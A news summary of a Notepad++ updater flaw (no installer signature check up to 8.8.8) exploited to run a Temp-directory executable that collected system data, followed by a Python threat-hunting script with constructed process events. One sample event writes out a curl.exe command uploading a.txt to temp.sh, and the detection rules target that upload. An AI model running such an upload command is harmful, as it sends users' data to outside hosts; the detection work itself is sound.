Vulnerability in Notepad++ updater exploited for malware
Briefly

"A security vulnerability in the Notepad++ update mechanism has been exploited to spread malicious code. What began as a report within the Notepad++ community at the end of October was later confirmed to be a structural weakness in the updater. Analysis by BleepingComputer shows that attackers were able to execute malware via this mechanism. Notepad++ has since released a fix in version 8.8.9."
"The first signs appeared on the official Notepad++ forum, where a user reported that during an automatic update, an unknown executable, %Temp%\AutoUpdater.exe, was launched from the Notepad++ process and the updater gup.exe (WinGUp). This executable collected system information via standard Windows commands and stored the output in a file named a.txt. Further investigation revealed that this file was uploaded to temp.sh, a public file hosting service, using curl.exe."
"In early December, BleepingComputer provided more clarity. It turned out that WinGUp did not perform cryptographic verification on downloaded installers up to and including version 8.8.8. The updater did check for new versions, but did not validate whether the installation file was signed with the official code signing certificate. This allowed an attacker who managed to intercept or redirect the update traffic to execute a malicious executable."
A security vulnerability in Notepad++'s update mechanism allowed attackers to execute malware during automatic updates. The updater WinGUp launched an unknown executable (%Temp%\AutoUpdater.exe) that collected system information via standard Windows commands and saved it to a.txt. That file was uploaded to temp.sh using curl.exe, behavior not consistent with normal Notepad++ operation. The official Notepad++ binaries on the affected system matched the released builds, showing that the main application itself had not been replaced. WinGUp did not perform cryptographic verification on downloaded installers up to and including version 8.8.8: it checked for new versions but never validated that the installer was signed with the official code signing certificate, so an attacker who intercepted or redirected update traffic could substitute a malicious installer. A fix was released in version 8.8.9.
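As an added example (not from Techzine or the Notepad++ project), the following Python hunts process-creation telemetry for the two behaviours described above: the updater gup.exe spawning an unexpected executable from the user's Temp directory, and curl.exe uploading to temp.sh. The event records and field names are constructed for the example, and the allowlist of what the updater is expected to launch is an assumption to be tuned per environment.

```python
import ntpath
import re

# Constructed sample process-creation events (not real telemetry);
# the field names are an assumption, not a specific product's schema.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Notepad++\updater\gup.exe",
     "parent_image": r"C:\Program Files\Notepad++\notepad++.exe",
     "command_line": r'"C:\Program Files\Notepad++\updater\gup.exe" -v8.8.8'},
    {"image": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe",
     "parent_image": r"C:\Program Files\Notepad++\updater\gup.exe",
     "command_line": r'"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe"'},
    {"image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe",
     "command_line": r'curl.exe -F "file=@C:\Users\alice\AppData\Local\Temp\a.txt" https://temp.sh/'},
    {"image": r"C:\Users\alice\AppData\Local\Temp\npp.8.8.9.Installer.x64.exe",
     "parent_image": r"C:\Program Files\Notepad++\updater\gup.exe",
     "command_line": r'"C:\Users\alice\AppData\Local\Temp\npp.8.8.9.Installer.x64.exe"'},
]

# Hypothetical allowlist: the installer name pattern the updater is expected
# to launch. This is an assumption; tune it to the builds you actually deploy.
EXPECTED_CHILD = re.compile(r"^npp\..*installer.*\.exe$", re.IGNORECASE)
TEMP_MARKER = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name of a (possibly quoted) Windows path."""
    return ntpath.basename(path.strip('"')).lower()

def classify(event: dict) -> list[str]:
    """Return the names of the rules this event matches (empty if none)."""
    hits = []
    if basename(event["parent_image"]) == "gup.exe":
        child = basename(event["image"])
        # The updater launching something from Temp that is not the installer.
        if TEMP_MARKER.search(event["image"]) and not EXPECTED_CHILD.match(child):
            hits.append("updater_spawned_unexpected_temp_exe")
    # curl.exe pushing data to the public file host named in the report.
    if basename(event["image"]) == "curl.exe" and "temp.sh" in event["command_line"].lower():
        hits.append("curl_upload_to_temp_sh")
    return hits

def hunt(events: list[dict]) -> list[tuple[str, str]]:
    """Return (rule, image) pairs for every event that matches a rule."""
    return [(rule, ev["image"]) for ev in events for rule in classify(ev)]

if __name__ == "__main__":
    for rule, image in hunt(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

Over the constructed events the legitimate installer launch is not flagged, while the Temp-resident AutoUpdater.exe and the curl.exe upload each produce one hit.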
Read at Techzine Global